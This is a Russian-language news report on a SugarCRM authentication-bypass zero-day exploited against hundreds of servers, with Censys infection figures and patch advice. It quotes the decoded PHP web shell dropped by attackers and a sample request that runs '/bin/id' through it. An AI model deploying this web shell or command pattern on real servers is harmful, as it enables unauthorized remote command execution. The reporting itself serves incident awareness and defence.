Сотни серверов SugarCRM заражены критическим эксплойтом в дикой природе

Увеличить

За последние две недели хакеры использовали критическую уязвимость в системе SugarCRM (управление взаимоотношениями с клиентами), чтобы заразить пользователей вредоносным ПО, которое дает им полный контроль над своими серверами.

Уязвимость возникла как нулевой день, когда код эксплойта был опубликован в Интернете в конце декабря. Человек, опубликовавший эксплойт, описал его как обход аутентификации с удаленным выполнением кода, что означает, что злоумышленник может использовать его для запуска вредоносного кода на уязвимых серверах без необходимых учетных данных. С тех пор SugarCRM опубликовала обзор, подтверждающий это описание. Сообщение об эксплойте также включало различные «дорки», которые представляют собой простые веб-поиски, которые люди могут выполнять для обнаружения уязвимых серверов в Интернете.

Марк Эллзи, старший исследователь безопасности службы сетевого мониторинга Censys, сообщил в электронном письме, что по состоянию на 11 января компания обнаружила 354 зараженных сервера SugarCRM с использованием нулевого дня. Это составляет почти 12% от общего числа 3059 серверов SugarCRM, обнаруженных Censys. На прошлой неделе самый высокий уровень инфицирования был в США — 90, за ними следуют Германия, Австралия и Франция. Во вторник Censys сообщила, что число заражений не сильно увеличилось с момента первоначального сообщения.

В бюллетене SugarCRM, опубликованном 5 января, доступны исправления и указано, что они уже применены к его облачной службе. Он также посоветовал пользователям, чьи экземпляры работали за пределами SugarCloud или управляемого хостинга SugarCRM, установить исправления. В бюллетене говорится, что уязвимость затронула программные решения Sugar Sell, Serve, Enterprise, Professional и Ultimate. Это не повлияло на программное обеспечение Sugar Market.

Обход аутентификации, согласно Censys, работает с каталогом /index.php/. «После успешного обхода аутентификации от службы получается файл cookie, и вторичный запрос POST отправляется по пути «/cache/images/sweet.phar», который загружает небольшой файл в формате PNG, содержащий код PHP, который будет выполняться сервер, когда делается другой запрос файла», — добавили исследователи компании.

Когда двоичный файл анализируется с помощью программного обеспечения шестнадцатеричного дампа и декодируется, код PHP примерно преобразуется в:

〈?php эхо "#####"; проход(base64_decode($_POST["c"])); эхо "#####"; ?〉

"Это простая веб-оболочка, которая будет запускать команды на основе значения аргумента запроса в кодировке base64, равного 'c' (например, 'POST /cache/images/sweet.phar?c ="L2Jpbi9pZA==" HTTP/ 1.1' , который запустит команду "/bin/id" с теми же разрешениями, что и идентификатор пользователя, запускающий веб-службу)», поясняется в сообщении.

Веб-оболочка представляет собой текстовое окно, которое злоумышленники могут использовать в качестве интерфейса для выполнения команд или кода по своему выбору на взломанных устройствах. Эллзи из Censys сказал, что компания не имеет точного представления о том, почему злоумышленники используют оболочки.

Проверки Censys и SugarCRM предоставляют индикаторы компрометации, которые клиенты SugarCRM могут использовать, чтобы определить, были ли они атакованы. Пользователи уязвимых продуктов должны найти и установить исправления как можно скорее.